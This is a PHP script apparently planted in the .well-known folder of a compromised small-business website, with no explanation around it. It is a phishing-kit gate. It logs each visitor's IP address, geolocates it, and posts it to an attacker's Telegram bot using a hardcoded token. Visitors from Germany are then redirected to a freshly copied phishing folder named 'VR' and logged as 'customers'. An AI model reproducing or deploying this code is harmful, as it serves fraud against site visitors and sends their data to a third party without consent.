Current File : /home/aircyqqr/brightsweepchimneyservices.com/.well-known//index.php
<?php
$ip = getenv("REMOTE_ADDR");
$file = fopen("vu.txt","a");
fwrite($file,$ip."  -  ".gmdate ("Y-n-d")." @ ".gmdate ("H:i:s")."\n");
        $ip=$_SERVER['REMOTE_ADDR'];
         $details = json_decode(file_get_contents("http://www.geoplugin.net/json.gp?ip=$ip"));
            $continent=$details->geoplugin_continentCode;
            $country=$details->geoplugin_countryCode;
            
$ok = ("$country : $ip.  -  ".gmdate ("Y-n-d")." @ ".gmdate ("H:i:s")."\n");
  $awebsite="https://api.telegram.org/bot1712734263:AAHBncmDh_d_w6vn5EhfVYvfVKnzlBaKRIY";
  $pparams=[
      'chat_id'=>'',
      'text'=>$ok,
  ];
  $chh = curl_init($awebsite . '/sendMessage');
  curl_setopt($chh, CURLOPT_HEADER, false);
  curl_setopt($chh, CURLOPT_RETURNTRANSFER, 1);
  curl_setopt($chh, CURLOPT_POST, 1);
  curl_setopt($chh, CURLOPT_POSTFIELDS, ($pparams));
  curl_setopt($chh, CURLOPT_SSL_VERIFYPEER, false);
  $result = curl_exec($chh);
  curl_close($chh);
  
  
if ($country == "DE") {
    $random=rand(0,100000);
$md5=md5("$random");
$dst= $random;
function recurse_copy($src,$dst) { 
    $dir = opendir($src); 
    @mkdir($dst); 
    while(false !== ( $file = readdir($dir)) ) { 
    if(( $file != '.' ) && ( $file != '..' )) { 
        if ( is_dir($src . '/' . $file) ) { 
        recurse_copy($src . '/' . $file,$dst . '/' . $file); 
         } 
    else { 
        copy($src . '/' . $file,$dst . '/' . $file); 
    } 
    } 
    } 
    closedir($dir); 
    } 
$src="VR";
recurse_copy( $src, $dst );
header("location:$dst");
$ip = getenv("REMOTE_ADDR");
$file = fopen("Customer.txt","a");
fwrite($file,$ip." |> ".gmdate ("Y-n-d")." ----> ".gmdate ("H:i:s")."\n");
    
}
?>